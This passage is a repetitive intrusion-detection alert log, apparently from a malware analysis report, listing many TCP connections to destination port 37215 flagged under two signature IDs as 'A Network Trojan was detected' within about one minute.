          SID:2829579
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259183
          SID:2829579
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786367
          SID:2835222
          Source Port:40206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239650
          SID:2835222
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114596
          SID:2829579
          Source Port:46616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843513
          SID:2829579
          Source Port:42614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162656
          SID:2835222
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306464
          SID:2835222
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406255
          SID:2829579
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456269
          SID:2829579
          Source Port:46260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409913
          SID:2829579
          Source Port:58298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353509
          SID:2829579
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782526
          SID:2829579
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854728
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467557
          SID:2835222
          Source Port:43506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509791
          SID:2829579
          Source Port:59194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178256
          SID:2829579
          Source Port:41840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729862
          SID:2829579
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107788
          SID:2829579
          Source Port:44632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860140
          SID:2829579
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744723
          SID:2829579
          Source Port:49716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113547
          SID:2835222
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462938
          SID:2829579
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463530
          SID:2835222
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855233
          SID:2835222
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352941
          SID:2829579
          Source Port:42162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546853
          SID:2829579
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128776
          SID:2829579
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897509
          SID:2829579
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180333
          SID:2829579
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671895
          SID:2829579
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177613
          SID:2835222
          Source Port:35868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462798
          SID:2829579
          Source Port:40498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708136
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188091
          SID:2835222
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108846
          SID:2835222
          Source Port:50678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2835222
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449451
          SID:2835222
          Source Port:34596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858959
          SID:2835222
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729437
          SID:2835222
          Source Port:49390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353958
          SID:2835222
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846199
          SID:2829579
          Source Port:38316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062814
          SID:2829579
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159402
          SID:2835222
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784116
          SID:2829579
          Source Port:35146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729357
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242398
          SID:2835222
          Source Port:55922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732005
          SID:2835222
          Source Port:59624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038061
          SID:2829579
          Source Port:58834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449698
          SID:2835222
          Source Port:43282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708279
          SID:2829579
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108103
          SID:2835222
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273405
          SID:2835222
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460261
          SID:2829579
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601342
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019674
          SID:2835222
          Source Port:37642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352530
          SID:2835222
          Source Port:52062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815621
          SID:2829579
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355728
          SID:2835222
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107090
          SID:2835222
          Source Port:49240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395110
          SID:2829579
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782474
          SID:2829579
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242844
          SID:2835222
          Source Port:55784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855096
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151389
          SID:2835222
          Source Port:43674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237894
          SID:2835222
          Source Port:36538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188878
          SID:2829579
          Source Port:42600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158545
          SID:2835222
          Source Port:36664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894423
          SID:2829579
          Source Port:56242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019787
          SID:2829579
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107933
          SID:2829579
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014524
          SID:2835222
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160512
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745677
          SID:2829579
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306233
          SID:2829579
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513028
          SID:2829579
          Source Port:59408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732119
          SID:2829579
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468153
          SID:2829579
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465881
          SID:2829579
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842119
          SID:2835222
          Source Port:36548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742542
          SID:2829579
          Source Port:60412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019858
          SID:2829579
          Source Port:51372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355957
          SID:2829579
          Source Port:57888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795677
          SID:2835222
          Source Port:39196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911967
          SID:2829579
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2835222
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159880
          SID:2829579
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673438
          SID:2829579
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738477
          SID:2829579
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890430
          SID:2835222
          Source Port:40898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115266
          SID:2829579
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176892
          SID:2829579
          Source Port:39242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174694
          SID:2829579
          Source Port:57400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672579
          SID:2829579
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257534
          SID:2829579
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269527
          SID:2829579
          Source Port:37814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787926
          SID:2829579
          Source Port:43434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745873
          SID:2829579
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463873
          SID:2835222
          Source Port:47950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146989
          SID:2829579
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709083
          SID:2835222
          Source Port:54388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037249
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108992
          SID:2835222
          Source Port:42048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299442
          SID:2829579
          Source Port:40000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555371
          SID:2829579
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670499
          SID:2835222
          Source Port:51864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729423
          SID:2835222
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112199
          SID:2829579
          Source Port:60356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114585
          SID:2835222
          Source Port:58496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276122
          SID:2835222
          Source Port:41784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271500
          SID:2829579
          Source Port:40298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747052
          SID:2835222
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800534
          SID:2835222
          Source Port:55148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239889
          SID:2829579
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402528
          SID:2829579
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026011
          SID:2835222
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861366
          SID:2835222
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395092
          SID:2829579
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159740
          SID:2829579
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729517
          SID:2829579
          Source Port:42754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162634
          SID:2829579
          Source Port:50700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306490
          SID:2835222
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158169
          SID:2835222
          Source Port:53198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823715
          SID:2829579
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862035
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509579
          SID:2835222
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793204
          SID:2829579
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471034
          SID:2835222
          Source Port:38488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262391
          SID:2829579
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273008
          SID:2835222
          Source Port:55700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858240
          SID:2829579
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106173
          SID:2829579
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044793
          SID:2835222
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145315
          SID:2835222
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546596
          SID:2829579
          Source Port:59812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274120
          SID:2829579
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351756
          SID:2829579
          Source Port:55344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708026
          SID:2829579
          Source Port:49876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894543
          SID:2835222
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465160
          SID:2835222
          Source Port:33900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242614
          SID:2829579
          Source Port:41106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160711
          SID:2835222
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099265
          SID:2829579
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896968
          SID:2829579
          Source Port:57672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112615
          SID:2835222
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237498
          SID:2835222
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148556
          SID:2829579
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706087
          SID:2835222
          Source Port:36344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913668
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179846
          SID:2835222
          Source Port:32814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352600
          SID:2829579
          Source Port:51762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707622
          SID:2835222
          Source Port:51404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444945
          SID:2835222
          Source Port:50164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747183
          SID:2835222
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108629
          SID:2835222
          Source Port:44948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184240
          SID:2835222
          Source Port:44386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742128
          SID:2829579
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302588
          SID:2829579
          Source Port:51338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449602
          SID:2835222
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153691
          SID:2829579
          Source Port:36570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267728
          SID:2835222
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466035
          SID:2829579
          Source Port:55310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135506
          SID:2829579
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044255
          SID:2835222
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153122
          SID:2829579
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465078
          SID:2835222
          Source Port:50382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553059
          SID:2829579
          Source Port:51706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860862
          SID:2835222
          Source Port:34548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895889
          SID:2835222
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020422
          SID:2829579
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403879
          SID:2835222
          Source Port:53898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441066
          SID:2829579
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460622
          SID:2835222
          Source Port:44760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353555
          SID:2835222
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148685
          SID:2829579
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099461
          SID:2835222
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448472
          SID:2835222
          Source Port:55438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132060
          SID:2835222
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706404
          SID:2835222
          Source Port:38610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471239
          SID:2835222
          Source Port:37592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352751
          SID:2835222
          Source Port:55882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019572
          SID:2829579
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795819
          SID:2829579
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087868
          SID:2835222
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901457
          SID:2835222
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734028
          SID:2829579
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741966
          SID:2835222
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858282
          SID:2835222
          Source Port:39816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895771
          SID:2835222
          Source Port:54314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601044
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461253
          SID:2829579
          Source Port:56152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599714
          SID:2829579
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709012
          SID:2829579
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676229
          SID:2829579
          Source Port:47044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846413
          SID:2829579
          Source Port:52220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600000
          SID:2829579
          Source Port:47308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509530
          SID:2829579
          Source Port:39512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788820
          SID:2829579
          Source Port:51490
          Destination Port:37215
